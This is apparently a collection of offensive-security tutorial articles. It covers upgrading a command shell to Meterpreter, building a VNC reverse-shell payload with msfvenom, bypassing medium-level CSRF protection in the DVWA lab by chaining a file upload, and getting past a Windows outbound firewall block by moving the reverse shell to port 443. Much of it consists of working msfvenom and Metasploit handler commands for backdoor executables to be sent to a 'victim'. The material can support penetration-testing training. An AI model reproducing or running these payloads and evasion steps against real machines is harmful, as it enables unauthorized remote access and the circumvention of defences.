Shell to Meterpreter using Session Command

In previous article we have seen how to upgrade a command shell into meterpreter using Post exploitation in metasploit. Again we are going to perform same task using a different technique.

msf auxiliary(telnet_login) >sessions

In following screenshot you can perceive that it is showing the TYPE for session 1: shell.

Once you got the reverse connection of remote system and access its command shell through metasploit now you can manipulate your active sessions.  You just need to type sessions –h as command inside metasploit, this help command will display the multiple option which can be utilized with active session.
msf auxiliary(telnet_login) >sessions –h

So in the following screenshot you can perceive that the highlighted option is used to upgrade a command shell into meterpreter session.

Since we have command shell so here we can use “-u” (option) with session ID for upgrading our shell into meterpreter session. Execute following command for session manipulation.
msf auxiliary(telnet_login) >sessions –u 1

When you will execute above command you will get meterpreter session as session 2. Now enjoy your meterpreter session and execute its command.
msf auxiliary(telnet_login) >sessions

Capture VNC Session of Remote PC using Msfvenom

Today in this article we’ll try to compromise the target using VNCpayload. In this tutorial you’ll learn how to create a VNC payload using msfvenom and try to achieve VNC shell of victim’s PC.
Open the terminal in your Kali Linux and type following command to generate a VNC payload using msfvenom command.

Msfvenom –p windows/vncinject/reverse_tcp lhost= lport=4444 –f exe > /root/Desktop/vnc.exe

Now the above command will generate an exe file for the VNC payload on the desktop of Kali Linux. Being an attack you need to send this backdoor to the target and start multi handler in the metasploit framework.

use multi/handler
msf exploit(handler) > set payload windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

Now attacker tries to connect with target using VNC payload, from given screenshot you can see it has launched vncviewer and we have our session 1 is running at background.

How to Upgrade Shell to Meterpreter

In network penetration testing, we always wish to hack a system of an internal network and try to make unauthorized access through a meterpreter session using the Metasploit framework.  But there are some exploits which will directly provide victim’s command shell instead of meterpreter session. In this article, we have tried to upgrade from the victim’s shell to a meterpreter shell.
Now once we have access to victims command shell then follow the steps given below to upgrade a command shell into the meterpreter shell.
Here I already have access to command shell of victim’s PC

So now we can use “-u” (option) with the session ID for upgrading our shell into meterpreter session. Execute the following command for session manipulation.

Other Way
This module attempts to upgrade a command shell to meterpreter. The shell platform is automatically detected and the best version of meterpreter for the target is selected.
use post/multi/manage/shell_to_meterpreter
msf post(shell_to_meterpreter) > set session 1
msf post(shell_to_meterpreter) > exploit

Bypass CSRF Medium Security in DVWA

In previous article we have discussed about how to bypass low level security if a web application server is suffering from cross site request forgery (CSRF). Today we will see how to exploit a web application server with CSRF attack if the security level get increased or say set to medium and try to change the password of admin without his permission.

Let’s start!!!

Again I have target DVWA for this tutorial and by default the credential set for it is admin: password. As you can see I have used them for login in DVWA

Set security level medium select the bug cross site request forgery as current vulnerability.  Here you see the text fields are given for changing the password of the database for user admin.

If you remembered in the previous article we have executed csrf.html file to change the password for admin when security level is low.

In following screenshot you can see I have given value= “hacker” as new password and confirm password.

Now I am going to test whether the same file csrf.html would be capable to change the password for admin when security level is medium. From screenshot you can see I try to execute csrf.html file which might reset the password.

As result you can see I didn’t successes to bypass medium security using csrf.html and got an error message “that request didn’t look correct”. Hence the technique which we have used in low security will get failed in medium security level.

Sometimes it might be possible that a web application server may have more than one vulnerabilities in it. It could be a big advantage because making use of other vulnerability we can perform an action to execute our malicious file through it.
 Now first of all change csrf.html into csrf.php file, then set low security level and switch into file uploading vulnerability inside DVWA.

 Here the above text file of html form is now saved as csrf.php is successfully uploaded in the server which you can see from given screenshot.

Now browse the path in URL to execute csrf.php file and click on change button.

From screenshot you can see without admin permission we have successfully changed his password.

Now let’s verify, as we know the previous credential was admin: password; here when I try to use them it shows the login failed.

Further when I try with admin: hacker as current credential, I login successfully inside DVWA. This was all about CSRF tutorial to bypass medium security in DVWA.

How to set and Bypass Outbound Rule in Windows Firewall using Metasploit

In previous the firewall penetration testing article you might have read how firewall is used for blocking any particular port in a network to prevent hackers or malicious software from gaining access to your PC. This article is written to describe that how an attacker can bypass firewall rules and try to make unauthorized access of victim’s PC.

Target: windows PC
Attacker: Kali Linux

Lets start!!!

Open window firewall control panel and select Advance setting to configure firewall rules as shown in screenshot.

Go to outbound rules to configure new rule for firewall to add security layer in network to secure it form attackers.

Select the type of firewall rule to be created click radio button for option Port that controls connections for a TCP and UDP port then click on next.

Now specify the protocol and port to which rule is applies therefore I choose TCP and then specify port 4444 on which this rule will applies and then click on next.

 Select radio button for block the connection when connection matches to the condition specified condition.

Select all check boxes when this rule applies.

Here give the name to your own specified rule.  You can see in the screenshot I had named it block port 4444 and then click on finished.

Here you can see the new outbound rule is added into the list of outbound rules. Hence victim has defense himself from establishing connection with port 4444, now if attacker try to connect with victim through port 4444 then it might be possible that attacker doesn’t receive any reverse connection.

Now let’s examine when an attacker tries to send malicious file using port 4444, will it work or not. Does attacker able to receive reverse connection of victim’s pc?

Here I have generated a malicious file using msfvenom in the format of .exe file and then send this 4444.exe file to victim and start multi handler at background.

msfvenom -p windows/meterpreter/reverse_tcp lhost= lport=4444 -f exe > /root/Desktop/4444.exe

Now let’s find whether we will succeed or get failed to achieve reverse connection of victims PC.

use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit

OOPS!!!  No response
It means we get failed in establishing connection between victim and attacker. Now as we know victim has protected himself from connecting with port 4444.

Now whenever you face such type of restriction for establishing connection with victim then do not get disappoint think twice what is the aim of an attack? He only wants to trap victim and want to establish a connection.

Now send your malicious file on those ports which always left open for incoming and outgoing connection.  For example port 80, port 443, port 445 and etc.

When again an attacker tries to send malicious file using port 443. Does attacker able to receive reverse connection of victim’s pc?

msfvenom -p windows/meterpreter/reverse_https lhost= lport=443 -f exe > /root/Desktop/443.exe

 Start multi handler and send 443.exe to victim.

use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
msf exploit(handler) > set lhost
msf exploit(handler) > set lport 443
msf exploit(handler) > exploit

GREAT!!!  Attack is successful
We successfully got meterpreter session of victim’s PC inside the metasploit framework.